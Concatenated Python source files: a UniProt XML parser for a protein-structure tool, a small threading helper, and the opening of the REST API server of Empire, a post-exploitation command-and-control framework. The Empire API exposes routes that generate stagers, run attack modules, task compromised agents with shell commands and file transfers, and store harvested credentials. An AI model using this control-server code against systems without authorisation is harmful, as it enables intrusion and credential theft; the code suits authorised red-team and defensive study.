for thread in threading.enumerate():
if thread.name == 'SyncThread':
return thread
return None
def create_and_start_sync_thread(sync_routine):
if not get_sync_thread():
sync_thread = SyncThread(target=sync_routine)
sync_thread.daemon = True
sync_thread.start()
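# A minimal, hedged usage sketch. The sync routine below is an assumption; any
# long-running callable that polls thread_is_stoppped() will work:
#
#     import time
#
#     def sync_routine():
#         while not thread_is_stoppped():
#             print('syncing...')   # placeholder for real work
#             time.sleep(5)
#
#     create_and_start_sync_thread(sync_routine)
#     # ...later, to shut it down cleanly...
#     thread = get_sync_thread()
#     if thread:
#         thread.stop()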
|
uniprot_master_parser.py
|
"""
This file parses the UniProt FTP file and can do various things, such as making a small version that is human-only.
But mainly the `UniprotMasterReader.convert('uniprot_sprot.xml')` method, which generates the JSON files required. In future these will be databases...
Be warned that ET.Element is a monkeypatched version.
"""
import os, json, re, time
from threading import Thread, Semaphore, Lock, active_count
import itertools
from .ET_monkeypatch import ET
from ._protein_gatherer import ProteinGatherer as Protein
from warnings import warn
from michelanglo_protein.generate.old_split_gnomAD import gnomAD
from collections import defaultdict
### Uniprot reader
class UniprotMasterReader:
"""
see generator iter_human
NB. The ET.Element has been expanded. See `help(ElementalExpansion)`
"""
def iter_human(self):
"""
        Iterates across a LARGE UniProt XML file and yields *only* the human entries.
:return: ET.Element()
"""
for event, elem in ET.iterparse(self.file, events=('end',)):
if elem is not None and isinstance(elem, ET.Element):
if elem.ns_strip() == 'entry':
if elem.is_human():
yield elem
elem.clear()
def iter_all(self, dataset=None):
"""
dataset = Swiss-Prot is better than TrEMBL
        Iterates across a LARGE UniProt XML file and yields entries regardless of species (not just human).
:return: ET.Element()
"""
count = 0
for event, elem in ET.iterparse(self.file, events=('end',)):
if elem is not None and isinstance(elem, ET.Element):
if elem.ns_strip() == 'entry':
if dataset and dataset != elem.get_attr('dataset'):
continue
count += 1
if count == self.first_n_protein:
break
yield elem
elem.clear()
def shrink(self, outfile='human_proteome.xml'):
"""
Make a smaller XML file, but with only the human proteome.
:param outfile:
:return:
"""
with open(outfile, 'wb') as proteo:
proteo.write(
b'<?xml version="1.0" encoding="UTF-8"?><uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' +
b'xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/docs/uniprot.xsd">')
for entry in self.iter_human():
proteo.write(ET.tostring(entry))
proteo.write(b'</uniprot>')
def parse_human(self):
return [Protein(entry) for entry in self.iter_human()]
@classmethod
def convert(cls, uniprot_master_file=None, first_n_protein=0):
"""
DO NOT USE!!!
:param uniprot_master_file:
        :param first_n_protein: set to zero for all, or to an integer n to get the first n.
:return:
"""
raise DeprecationWarning('DO NOT USE!')
if uniprot_master_file is None:
uniprot_master_file = os.path.join(Protein.settings.reference_folder, 'uniprot_sprot.xml')
Protein.settings.retrieve_references(ask = True)
count=0
greater_namedex = {}
lesser_namedex = {}
seqdex = {}
genedex = {}
for entry in cls(uniprot_master_file).iter_human():
count+=1
if count == first_n_protein:
break
prot = Protein.from_uniprot(entry)
chosen_name = prot.accession_list[0] #ideally prot.uniprot_name or the first acc id. But for code usage going for gene name.
# fill namedex
greater_namedex[prot.uniprot_name] = chosen_name
greater_namedex[prot.recommended_name] = chosen_name
greater_namedex[prot.gene_name] = chosen_name
for group in [prot.alt_gene_name_list, prot.alternative_fullname_list, prot.alternative_shortname_list]:
for name in group:
                    if re.match(r'[\d\-]+\.[\d\-]+\.[\d\-]+\.[\d\-]+', name):
continue # no EC numbers!
lesser_namedex[name] = chosen_name
# fill seqdex
seqdex[chosen_name] = prot.sequence
genedex[chosen_name] = prot.gene_name
# save
prot.write_uniprot(os.path.join(Protein.settings.uniprot_folder, chosen_name+'_uniprot.xml'))
# prot.
namedex = {**lesser_namedex, **greater_namedex}
# cleanup
for k in ('\n ', '\n ', '\n ', '\n ', '', '\n', ' '):
if k in namedex:
del namedex[k]
json.dump(namedex, open(os.path.join(Protein.settings.data_folder, 'human_prot_namedex.json'), 'w')) # name to uniprot
#json.dump(genedex, open(os.path.join(Protein.settings.temp_folder, 'human_prot_genedex.json'), 'w')) # uniprot to name. not needed.
#json.dump(seqdex, open(os.path.join(Protein.settings.temp_folder, 'human_prot_seqdex.json'), 'w')) # not needed.
open(os.path.join(Protein.settings.temp_folder, 'human.fa'), 'w').writelines(['>{i}\n{s}\n\n'.format(s=seqdex[k], i=k) for k in seqdex])
def __init__(self, uniprot_master_file=None, first_n_protein=0, chosen_attribute='uniprot'):
"""
THIS IS FOR MICHELANGLO
:param uniprot_master_file:
        :param first_n_protein: set to zero for all, or to an integer n to get the first n.
:return:
"""
if uniprot_master_file is None:
uniprot_master_file = os.path.join(Protein.settings.reference_folder, 'uniprot_sprot.xml')
#Protein.settings.retrieve_references(ask=False)
if not os.path.exists(os.path.join(Protein.settings.data_folder, 'gnomAD')):
#gnomAD().split().write('gnomAD')
warn('I turned off this step!!!')
self.file = uniprot_master_file
self.first_n_protein = first_n_protein
self.chosen_attribute = chosen_attribute
self._uniprot_pdbdex = defaultdict(list) #: dict of key=uniprot and value=list of PDB codes
self._uniprot_datasetdex = defaultdict(str) #: dict of key=uniprot and value=dataset type Swiss-Prot | TrEMBL
        self._organism_greater_namedex = defaultdict(dict) #: dict of taxid as keys, with dict value with keys names and values preferred name (uniprot id) for the good names
        self._organism_lesser_namedex = defaultdict(dict) #: dict of taxid as keys, with dict value with keys names and values preferred name (uniprot id) for the potentially stinky names
self._uniprot_namedex = {} #: dict of key=uniprot and value=human name for title
self._uniprot_speciesdex = {} #: dict of key=uniprot and value=taxid
self._organismdex = {} #: dict of key=orgnism names and value=taxid
self._semaphore = Semaphore(50)
self._lock = Lock()
idleness = active_count()
# preload some steps to speed up
with Protein.settings.open('resolution') as fh:
resolutions = {entry['IDCODE']: float(entry['RESOLUTION']) for entry in json.load(fh) if
entry['RESOLUTION'].strip()}
self.resolutions = resolutions
# run
for entry in self.iter_all():
Thread(target=self.parse, args=[entry]).start()
while active_count() > 50:
time.sleep(1)
while active_count() > idleness: #no idea why it is two not one...
print('DEBUG: waiting...', active_count(), idleness)
print(self._lock)
print(self._semaphore)
time.sleep(1)
# final touches to the whole sets...
for org in list(self._organism_greater_namedex.keys()):
namedex = {**self._organism_lesser_namedex[org], **self._organism_greater_namedex[org]}
# cleanup
for k in ('\n ', '\n ', '\n ', '\n ', '', '\n', ' '):
if k in namedex:
del namedex[k]
#namedex = {k.lower(): namedex[k] for k in namedex}
fn = os.path.join(Protein.settings.dictionary_folder, f'taxid{org}-names2{chosen_attribute}.json')
json.dump(namedex, open(fn, 'w')) # name to pdbs
fn = os.path.join(Protein.settings.dictionary_folder, f'organism.json')
json.dump(self._organismdex, open(fn, 'w')) # organism to taxid
# lighten
for dex, fn in ((self._uniprot_pdbdex, 'uniprot2pdb.json'),
(self._uniprot_namedex, 'uniprot2name.json'),
(self._uniprot_speciesdex, 'uniprot2species.json')):
fp = os.path.join(Protein.settings.dictionary_folder, fn)
json.dump({k: dex[k] for k in dex if dex[k]}, open(fp, 'w'))
def parse(self, entry):
## parser...
#print('waiting for semaphore')
self._semaphore.acquire()
#print('waited for semaphore')
prot = Protein.from_uniprot(entry)
if prot.uniprot in self._uniprot_datasetdex:
#print('Repeated uniprot!', prot.uniprot)
self._semaphore.release()
return None
#print('getting offsets')
prot.get_offsets()
#.get_resolutions() too slow.
self.get_resolutions_for_prot(prot)
if prot.organism['common'] == 'Human':
prot.parse_swissmodel()
pass
prot.compute_params()
## dict
chosen_name = getattr(prot, self.chosen_attribute)
# update the organism dex
org = prot.organism['NCBI Taxonomy']
#print('waiting for lock')
self._lock.acquire()
#print('waited for lock')
try:
prot.dump() # gdump??
#print('dumping')
if org not in self._organismdex:
for k in prot.organism:
self._organismdex[prot.organism[k]] = org
# make dictionaries...
self._uniprot_datasetdex[prot.uniprot] = prot.uniprot_dataset
self._uniprot_pdbdex[prot.uniprot].extend([p.id for p in prot.pdbs])
if prot.gene_name and prot.gene_name in self._organism_greater_namedex[org]:
if prot.organism['scientific'] == 'Homo sapiens':
print('#' * 20)
print('CLASH!!!!!', prot.gene_name, prot.uniprot, prot.organism['scientific'],
prot.recommended_name,
self._uniprot_datasetdex[prot.uniprot],
self._uniprot_datasetdex[self._organism_greater_namedex[org][prot.gene_name]])
if prot.uniprot_dataset == 'TrEMBL' and self._uniprot_datasetdex[
self._organism_greater_namedex[org][prot.gene_name]] == 'Swiss-Prot':
self._lock.release()
return None
if prot.recommended_name and prot.recommended_name in self._organism_greater_namedex[org]:
if prot.organism['scientific'] == 'Homo sapiens':
print('#' * 20)
print('CLASH!!!!!', prot.gene_name, prot.uniprot, prot.recommended_name,
self._uniprot_datasetdex[prot.uniprot],
self._uniprot_datasetdex[self._organism_greater_namedex[org][prot.recommended_name]])
if prot.uniprot_dataset == 'TrEMBL' and self._uniprot_datasetdex[
self._organism_greater_namedex[org][prot.recommended_name]] == 'Swiss-Prot':
self._lock.release()
return None
self._organism_greater_namedex[org][prot.uniprot] = chosen_name
self._organism_greater_namedex[org][prot.uniprot_name] = chosen_name
self._organism_greater_namedex[org][prot.recommended_name] = chosen_name
self._organism_greater_namedex[org][prot.gene_name] = chosen_name
self._uniprot_namedex[prot.uniprot] = prot.recommended_name
self._uniprot_speciesdex[prot.uniprot] = org
for group in [prot.alt_gene_name_list, prot.alternative_fullname_list, prot.alternative_shortname_list]:
for name in group:
                    if re.match(r'[\d\-]+\.[\d\-]+\.[\d\-]+\.[\d\-]+', name):
continue # no EC numbers!
self._organism_lesser_namedex[org][name] = chosen_name
self._lock.release()
self._semaphore.release()
#print(prot.uniprot)
return None
except Exception as error:
print(error.__class__.__name__, str(error))
self._lock.release()
self._semaphore.release()
def get_resolutions_for_prot(self, prot):
# modified from lookup_resolution
for pdb in prot.pdbs:
if pdb.type != 'rcsb':
pass
elif pdb.code in self.resolutions:
pdb.resolution = self.resolutions[pdb.code]
else:
warn(f'No resolution info for {pdb.code}')
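# A minimal, hedged usage sketch: instantiating the reader drives the whole parse
# from __init__ (worker threads fan out over the entries and the name/pdb/species
# dictionaries are written under Protein.settings.dictionary_folder). The file
# path and entry count below are assumptions.
#
#     reader = UniprotMasterReader('uniprot_sprot.xml', first_n_protein=100)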
|
server.py
|
#!/usr/bin/env python3
from __future__ import print_function
import base64
import copy
import hashlib
import json
import logging
import os
import pkgutil
import random
import signal
import ssl
import string
import subprocess
import sys
import time
from typing import List
import urllib3
import requests
import socketio
from datetime import datetime, timezone
from time import sleep
import flask
from flask import Flask, request, jsonify, make_response, abort, g
from flask.json import JSONEncoder
from flask_socketio import SocketIO, join_room, leave_room
from sqlalchemy import and_, or_
from sqlalchemy.orm import aliased, joinedload, undefer
# Empire imports
from empire.server.common import empire, helpers
from empire.server.common.empire import MainMenu
from empire.server.common.module_models import PydanticModule
from empire.server.database.base import Session
from empire.server.database import models
from empire.server.common.config import empire_config
# Check if running Python 3
if sys.version_info[0] == 2:
print(helpers.color("[!] Please use Python 3"))
sys.exit()
global serverExitCommand
serverExitCommand = 'restart'
# Disable flask warning banner for development server in production environment
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
# Disable http warnings
if empire_config.yaml.get('suppress-self-cert-warning', True):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Set proxy IDs
PROXY_NAME = {
"SOCKS4": 1,
"SOCKS5": 2,
"HTTP": 3,
"SSL": 4,
"SSL_WEAK": 5,
"SSL_ANON": 6,
"TOR": 7,
"HTTPS": 8,
"HTTP_CONNECT": 9,
"HTTPS_CONNECT": 10
}
# Reverse mapping of proxy IDs to names
PROXY_IDS = {ID: name for name, ID in PROXY_NAME.items()}
#####################################################
#
# Database interaction methods for the RESTful API
#
#####################################################
class MyJsonEncoder(JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return o.isoformat()
if isinstance(o, bytes):
return o.decode('latin-1')
return super().default(o)
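# A quick, hedged illustration of what the encoder above does once registered on
# the Flask app (the sample values are assumptions):
#
#     json.dumps({'seen': datetime(2021, 1, 1), 'blob': b'\x00\xff'}, cls=MyJsonEncoder)
#     # -> roughly '{"seen": "2021-01-01T00:00:00", "blob": "\u0000\u00ff"}'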
####################################################################
#
# The Empire RESTful API. To see more information about it, check out the official wiki.
#
# Adapted from http://blog.miguelgrinberg.com/post/designing-a-restful-api-with-python-and-flask.
# Example code at https://gist.github.com/miguelgrinberg/5614326.
#
#
# Verb URI Action
# ---- --- ------
# GET http://localhost:1337/api/version return the current Empire version
# GET http://localhost:1337/api/map return list of all API routes
# GET http://localhost:1337/api/config return the current default config
#
# GET http://localhost:1337/api/stagers return all current stagers
# GET http://localhost:1337/api/stagers/X return the stager with name X
# POST http://localhost:1337/api/stagers generate a stager given supplied options (need to implement)
#
# GET http://localhost:1337/api/modules return all current modules
# GET http://localhost:1337/api/modules/<name> return the module with the specified name
# POST http://localhost:1337/api/modules/<name> execute the given module with the specified options
# POST    http://localhost:1337/api/modules/search                   searches modules for a passed term
# POST http://localhost:1337/api/modules/search/modulename searches module names for a specific term
# POST http://localhost:1337/api/modules/search/description searches module descriptions for a specific term
# POST http://localhost:1337/api/modules/search/comments searches module comments for a specific term
# POST http://localhost:1337/api/modules/search/author searches module authors for a specific term
#
# GET http://localhost:1337/api/listeners return all current listeners
# GET http://localhost:1337/api/listeners/Y return the listener with id Y
# DELETE http://localhost:1337/api/listeners/Y kills listener Y
# GET http://localhost:1337/api/listeners/types returns a list of the loaded listeners that are available for use
# GET http://localhost:1337/api/listeners/options/Y return listener options for Y
# POST http://localhost:1337/api/listeners/Y starts a new listener with the specified options
#
# GET http://localhost:1337/api/agents return all current agents
# GET http://localhost:1337/api/agents/stale return all stale agents
# DELETE http://localhost:1337/api/agents/stale removes stale agents from the database
# DELETE http://localhost:1337/api/agents/Y removes agent Y from the database
# GET http://localhost:1337/api/agents/Y return the agent with name Y
# GET http://localhost:1337/api/agents/Y/directory return the directory with the name given by the query parameter 'directory'
# POST http://localhost:1337/api/agents/Y/directory task the agent Y to scrape the directory given by the query parameter 'directory'
# GET http://localhost:1337/api/agents/Y/results return tasking results for the agent with name Y
# DELETE http://localhost:1337/api/agents/Y/results deletes the result buffer for agent Y
# GET http://localhost:1337/api/agents/Y/task/Z return the tasking Z for agent Y
# POST http://localhost:1337/api/agents/Y/download task agent Y to download a file
# POST http://localhost:1337/api/agents/Y/upload task agent Y to upload a file
# POST http://localhost:1337/api/agents/Y/shell task agent Y to execute a shell command
# POST http://localhost:1337/api/agents/Y/rename rename agent Y
# GET/POST http://localhost:1337/api/agents/Y/clear clears the result buffer for agent Y
# GET/POST http://localhost:1337/api/agents/Y/kill kill agent Y
#
# GET http://localhost:1337/api/creds return stored credentials
# POST http://localhost:1337/api/creds add creds to the database
#
# GET http://localhost:1337/api/reporting return all logged events
# GET http://localhost:1337/api/reporting/agent/X return all logged events for the given agent name X
# GET http://localhost:1337/api/reporting/type/Y return all logged events of type Y (checkin, task, result, rename)
# GET http://localhost:1337/api/reporting/msg/Z return all logged events matching message Z, wildcards accepted
#
#
# POST http://localhost:1337/api/admin/login retrieve the API token given the correct username and password
# POST http://localhost:1337/api/admin/logout logout of current user account
# GET http://localhost:1337/api/admin/restart restart the RESTful API
# GET http://localhost:1337/api/admin/shutdown shutdown the RESTful API
#
# GET http://localhost:1337/api/users return all users from database
# GET http://localhost:1337/api/users/X return the user with id X
# GET http://localhost:1337/api/users/me return the user for the given token
# POST http://localhost:1337/api/users add a new user
# PUT http://localhost:1337/api/users/Y/disable disable/enable user Y
# PUT http://localhost:1337/api/users/Y/updatepassword update password for user Y
#
####################################################################
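# A hedged client-side sketch of the routes above, using `requests` against a
# local instance. The port, credentials, and response field names are
# assumptions; certificate verification is disabled only because the
# development server typically uses a self-signed cert.
#
#     import requests
#
#     login = requests.post('https://localhost:1337/api/admin/login',
#                           json={'username': '<username>', 'password': '<password>'},
#                           verify=False).json()
#     token = login['token']
#     version = requests.get('https://localhost:1337/api/version',
#                            params={'token': token}, verify=False).json()
#     print(version)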
def start_restful_api(empireMenu: MainMenu, suppress=False, headless=False, username=None, password=None, ip='0.0.0.0',
port=1337):
"""
Kick off the RESTful API with the given parameters.
empireMenu - Main empire menu object
suppress - suppress most console output
username - optional username to use for the API, otherwise pulls from the empire.db config
password - optional password to use for the API, otherwise pulls from the empire.db config
ip - ip to bind the API to, defaults to 0.0.0.0
port - port to start the API on, defaults to 1337 ;)
"""
app = Flask(__name__)
app.json_encoder = MyJsonEncoder
main = empireMenu
global serverExitCommand
if username:
main.users.update_username(1, username[0])
if password:
main.users.update_password(1, password[0])
print(helpers.color("[*] Starting Empire RESTful API on %s:%s" % (ip, port)))
oldStdout = sys.stdout
if suppress:
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
if headless:
# suppress all stdout and don't initiate the main cmdloop
sys.stdout = open(os.devnull, 'w')
# validate API token before every request except for the login URI
@app.before_request
def check_token():
"""
Before every request, check if a valid token is passed along with the request.
"""
try:
if request.path != '/api/admin/login':
token = request.args.get('token')
if token and len(token) > 0:
user = main.users.get_user_from_token(token)
if user:
g.user = user
else:
return make_response('', 401)
else:
return make_response('', 401)
        except Exception:
return make_response('', 401)
@app.after_request
def add_cors(response):
response.headers['Access-Control-Allow-Origin'] = '*'
return response
@app.teardown_request
def remove_session(ex):
Session.remove()
@app.errorhandler(Exception)
def exception_handler(error):
"""
Generic exception handler.
"""
        code = error.code if hasattr(error, 'code') else 500
return make_response(jsonify({'error': repr(error)}), code)
@app.errorhandler(404)
def not_found(error):
"""
404/not found handler.
"""
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/api/version', methods=['GET'])
def get_version():
"""
Returns the current Empire version.
"""
return jsonify({'version': empire.VERSION})
@app.route('/api/map', methods=['GET'])
def list_routes():
"""
List all of the current registered API routes.
"""
output = {}
for rule in app.url_map.iter_rules():
methods = ','.join(rule.methods)
url = rule.rule
output.update({rule.endpoint: {'methods': methods, 'url': url}})
return jsonify({'Routes': output})
@app.route('/api/config', methods=['GET'])
def get_config():
"""
Returns JSON of the current Empire config.
"""
api_username = g.user['username']
api_current_token = g.user['api_token']
config = Session().query(models.Config).first()
        dictret = dict(config.__dict__)
dictret.pop('_sa_instance_state', None)
dictret['api_username'] = api_username
dictret['current_api_token'] = api_current_token
dictret['version'] = empire.VERSION
return jsonify({"config": dictret})
@app.route('/api/stagers', methods=['GET'])
def get_stagers():
"""
Returns JSON describing all stagers.
"""
stagers = []
for stager_name, stager in main.stagers.stagers.items():
info = copy.deepcopy(stager.info)
info['options'] = stager.options
info['Name'] = stager_name
stagers.append(info)
return jsonify({'stagers': stagers})
@app.route('/api/stagers/<path:stager_name>', methods=['GET'])
def get_stagers_name(stager_name):
"""
Returns JSON describing the specified stager_name passed.
"""
if stager_name not in main.stagers.stagers:
return make_response(jsonify({
'error': 'stager name %s not found, make sure to use [os]/[name] format, ie. windows/dll' % (
stager_name)}), 404)
stagers = []
stager = main.stagers.stagers[stager_name]
info = copy.deepcopy(stager.info)
info['options'] = stager.options
info['Name'] = stager_name
stagers.append(info)
return jsonify({'stagers': stagers})
@app.route('/api/stagers', methods=['POST'])
def generate_stager():
"""
Generates a stager with the supplied config and returns JSON information
describing the generated stager, with 'Output' being the stager output.
Required JSON args:
StagerName - the stager name to generate
Listener - the Listener name to use for the stager
"""
        if not request.json or 'StagerName' not in request.json or 'Listener' not in request.json:
abort(400)
stager_name = request.json['StagerName']
listener = request.json['Listener']
if stager_name not in main.stagers.stagers:
return make_response(jsonify({'error': 'stager name %s not found' % (stager_name)}), 404)
if not main.listeners.is_listener_valid(listener):
return make_response(jsonify({'error': 'invalid listener ID or name'}), 400)
stager = main.stagers.stagers[stager_name]
# set all passed options
for option, values in request.json.items():
if option != 'StagerName':
if option not in stager.options:
return make_response(jsonify({'error': 'Invalid option %s, check capitalization.' % (option)}), 400)
stager.options[option]['Value'] = values
# validate stager options
for option, values in stager.options.items():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
return make_response(jsonify({'error': 'required stager options missing'}), 400)
if values['Strict'] and values['Value'] not in values['SuggestedValues']:
                return make_response(jsonify({'error': f'{option} must be set to one of the suggested values.'}), 400)
stager_out = copy.deepcopy(stager.options)
if ('OutFile' in stager_out) and (stager_out['OutFile']['Value'] != ''):
if isinstance(stager.generate(), str):
# if the output was intended for a file, return the base64 encoded text
stager_out['Output'] = base64.b64encode(stager.generate().encode('UTF-8'))
else:
stager_out['Output'] = base64.b64encode(stager.generate())
else:
# otherwise return the text of the stager generation
stager_out['Output'] = stager.generate()
return jsonify({stager_name: stager_out})
@app.route('/api/modules', methods=['GET'])
def get_modules():
"""
Returns JSON describing all currently loaded modules.
"""
modules = []
for moduleName, module in main.modules.modules.items():
mod_dict = module.dict()
module_info = {'Name': moduleName,
'Author': mod_dict.get('authors'),
'Background': mod_dict.get('background'),
'Comments': mod_dict.get('comments'),
'Description': mod_dict.get('description'),
'Enabled': mod_dict.get('enabled'),
'Language': mod_dict.get('language'),
'MinLanguageVersion': mod_dict.get('min_language_version'),
'NeedsAdmin': mod_dict.get('needs_admin'),
'OpsecSafe': mod_dict.get('opsec_safe'),
'options': {x['name']: {'Description': x['description'],
'Required': x['required'],
'Value': x['value'],
'SuggestedValues': x['suggested_values'],
'Strict': x['strict']} for x in mod_dict.get('options')},
'OutputExtension': mod_dict.get('output_extension'),
'Software': mod_dict.get('software'),
'Techniques': mod_dict.get('techniques')}
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/modules/<path:module_name>', methods=['GET'])
def get_module_name(module_name):
"""
        Returns JSON describing the specified, currently loaded module.
"""
if module_name not in main.modules.modules:
return make_response(jsonify({'error': 'module name %s not found' % (module_name)}), 404)
modules = []
mod_dict = main.modules.modules[module_name].dict()
module_info = {'Name': module_name,
'Author': mod_dict.get('authors'),
'Background': mod_dict.get('background'),
'Comments': mod_dict.get('comments'),
'Description': mod_dict.get('description'),
'Enabled': mod_dict.get('enabled'),
'Language': mod_dict.get('language'),
'MinLanguageVersion': mod_dict.get('min_language_version'),
'NeedsAdmin': mod_dict.get('needs_admin'),
'OpsecSafe': mod_dict.get('opsec_safe'),
'options': {x['name']: {'Description': x['description'],
'Required': x['required'],
'Value': x['value'],
'SuggestedValues': x['suggested_values'],
'Strict': x['strict']} for x in mod_dict.get('options')},
'OutputExtension': mod_dict.get('output_extension'),
'Software': mod_dict.get('software'),
'Techniques': mod_dict.get('techniques')}
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/modules/disable', methods=['POST'])
def disable_modules():
"""
Disable list of modules
"""
        if not request.json or 'module_list' not in request.json:
abort(400)
module_list = request.json['module_list']
main.modules.change_module_state(main, module_list, False)
return jsonify({'success': True})
@app.route('/api/modules/enable', methods=['POST'])
def enable_modules():
"""
Enable list of modules
"""
        if not request.json or 'module_list' not in request.json:
abort(400)
module_list = request.json['module_list']
main.modules.change_module_state(main, module_list, True)
return jsonify({'success': True})
@app.route('/api/modules/<path:module_name>', methods=['POST'])
def execute_module(module_name):
"""
Executes a given module name with the specified parameters.
"""
module: PydanticModule = main.modules.get_module(module_name)
if not module:
return make_response(jsonify({'error': f'module name {module_name} not found'}), 404)
result, err = main.modules.execute_module(module, params=request.json, user_id=g.user['id'])
if err:
return make_response(jsonify({'error': err}), 400)
return make_response(jsonify(result), 200)
@app.route('/api/modules/search', methods=['POST'])
def search_modules():
"""
        Returns JSON describing the modules matching the passed
'term' search parameter. Module name, description, comments,
and author fields are searched.
"""
        if not request.json or 'term' not in request.json:
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in moduleName.lower()) or (
search_term.lower() in ("".join(module.info['Description'])).lower()) or (
search_term.lower() in ("".join(module.info['Comments'])).lower()) or (
search_term.lower() in ("".join(module.info['Author'])).lower()):
moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info)
moduleInfo['options'] = main.modules.modules[moduleName].options
moduleInfo['Name'] = moduleName
modules.append(moduleInfo)
return jsonify({'modules': modules})
@app.route('/api/modules/search/modulename', methods=['POST'])
def search_modules_name():
"""
        Returns JSON describing the modules matching the passed
        'term' search parameter for the module name.
"""
        if not request.json or 'term' not in request.json:
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in moduleName.lower()):
module_info = copy.deepcopy(main.modules.modules[moduleName].info)
module_info['options'] = main.modules.modules[moduleName].options
module_info['Name'] = moduleName
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/modules/search/description', methods=['POST'])
def search_modules_description():
"""
        Returns JSON describing the modules matching the passed
'term' search parameter for the 'Description' field.
"""
        if not request.json or 'term' not in request.json:
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in ("".join(module.info['Description'])).lower()):
moduleInfo = copy.deepcopy(main.modules.modules[moduleName].info)
moduleInfo['options'] = main.modules.modules[moduleName].options
moduleInfo['Name'] = moduleName
modules.append(moduleInfo)
return jsonify({'modules': modules})
@app.route('/api/modules/search/comments', methods=['POST'])
def search_modules_comments():
"""
        Returns JSON describing the modules matching the passed
'term' search parameter for the 'Comments' field.
"""
        if not request.json or 'term' not in request.json:
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in ("".join(module.info['Comments'])).lower()):
module_info = copy.deepcopy(main.modules.modules[moduleName].info)
module_info['options'] = main.modules.modules[moduleName].options
module_info['Name'] = moduleName
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/modules/search/author', methods=['POST'])
def search_modules_author():
"""
        Returns JSON describing the modules matching the passed
'term' search parameter for the 'Author' field.
"""
        if not request.json or 'term' not in request.json:
abort(400)
search_term = request.json['term']
modules = []
for moduleName, module in main.modules.modules.items():
if (search_term.lower() == '') or (search_term.lower() in ("".join(module.info['Author'])).lower()):
module_info = copy.deepcopy(main.modules.modules[moduleName].info)
module_info['options'] = main.modules.modules[moduleName].options
module_info['Name'] = moduleName
modules.append(module_info)
return jsonify({'modules': modules})
@app.route('/api/listeners', methods=['GET'])
def get_listeners():
"""
Returns JSON describing all currently registered listeners.
"""
active_listeners_raw = Session().query(models.Listener).all()
listeners = []
for active_listener in active_listeners_raw:
listeners.append({'ID': active_listener.id, 'name': active_listener.name, 'module': active_listener.module,
'listener_type': active_listener.listener_type,
'listener_category': active_listener.listener_category,
'options': active_listener.options,
'created_at': active_listener.created_at,
'enabled': active_listener.enabled})
return jsonify({"listeners": listeners})
@app.route('/api/listeners/<string:listener_type>/validate', methods=['POST'])
def validate_listeners(listener_type):
"""
Returns JSON describing all currently registered listeners.
"""
if listener_type.lower() not in main.listeners.loadedListeners:
return make_response(jsonify({'error': f"listener type {listener_type} not found"}), 404)
listener_object = main.listeners.loadedListeners[listener_type]
# set all passed options
for option, values in request.json.items():
if isinstance(values, bytes):
values = values.decode('UTF-8')
if option == "Name":
listener_name = values
return_options = main.listeners.set_listener_option(listener_type, option, values)
if not return_options:
return make_response(
jsonify({'error': 'error setting listener value %s with option %s' % (option, values)}), 400)
validation = listener_object.validate_options()
if validation == True:
return jsonify({'success': True})
elif not validation:
return jsonify({'error': 'failed to validate listener %s options' % listener_name})
else:
return jsonify({'error': validation})
@app.route('/api/listeners/<string:listener_name>', methods=['GET'])
def get_listener_name(listener_name):
"""
Returns JSON describing the listener specified by listener_name.
"""
active_listener = Session().query(models.Listener).filter(models.Listener.name == listener_name).first()
if not active_listener:
return make_response(jsonify({'error': 'listener name %s not found' % listener_name}), 404)
listeners = [{'ID': active_listener.id, 'name': active_listener.name, 'module': active_listener.module,
'listener_type': active_listener.listener_type,
'listener_category': active_listener.listener_category,
'options': active_listener.options}]
return jsonify({'listeners': listeners})
@app.route('/api/listeners/<string:listener_name>', methods=['DELETE'])
def kill_listener(listener_name):
"""
Kills the listener specified by listener_name.
"""
if listener_name.lower() == "all":
active_listeners_raw = Session().query(models.Listener).all()
for active_listener in active_listeners_raw:
main.listeners.kill_listener(active_listener.name)
return jsonify({'success': True})
else:
if listener_name != "" and main.listeners.is_listener_valid(listener_name):
main.listeners.kill_listener(listener_name)
return jsonify({'success': True})
else:
return make_response(jsonify({'error': 'listener name %s not found' % listener_name}), 404)
@app.route('/api/listeners/<string:listener_name>/disable', methods=['PUT'])
def disable_listener(listener_name):
"""
Disables the listener specified by listener_name.
"""
if listener_name != "" and main.listeners.is_listener_valid(listener_name):
main.listeners.disable_listener(listener_name)
return jsonify({'success': True})
else:
return make_response(jsonify({'error': 'listener name %s not found or already disabled' % listener_name}), 404)
@app.route('/api/listeners/<string:listener_name>/enable', methods=['PUT'])
def enable_listener(listener_name):
"""
Enable the listener specified by listener_name.
"""
if listener_name != "" and listener_name in main.listeners.get_inactive_listeners():
main.listeners.enable_listener(listener_name)
return jsonify({'success': True})
else:
return make_response(jsonify({'error': 'listener name %s not found or already enabled' % listener_name}), 404)
@app.route('/api/listeners/<string:listener_name>/edit', methods=['PUT'])
def edit_listener(listener_name):
"""
Edit listener specified by listener_name.
"""
        if not request.json.get('option_name'):
return make_response(jsonify({'error': 'option_name not provided'}), 400)
if main.listeners.is_listener_valid(listener_name):
return make_response(jsonify({'error': 'Provided listener should be disabled'}), 400)
option_name = request.json['option_name']
option_value = request.json.get('option_value', '')
if listener_name in main.listeners.get_inactive_listeners():
# todo For right now, setting listener options via update does not go through the same validation and formatters
# that start_listener does. In order to do that requires some refactors on listeners.py to use the db better
# as a source of truth and not depend on all the in-memory objects.
success = main.listeners.update_listener_options(listener_name, option_name, option_value)
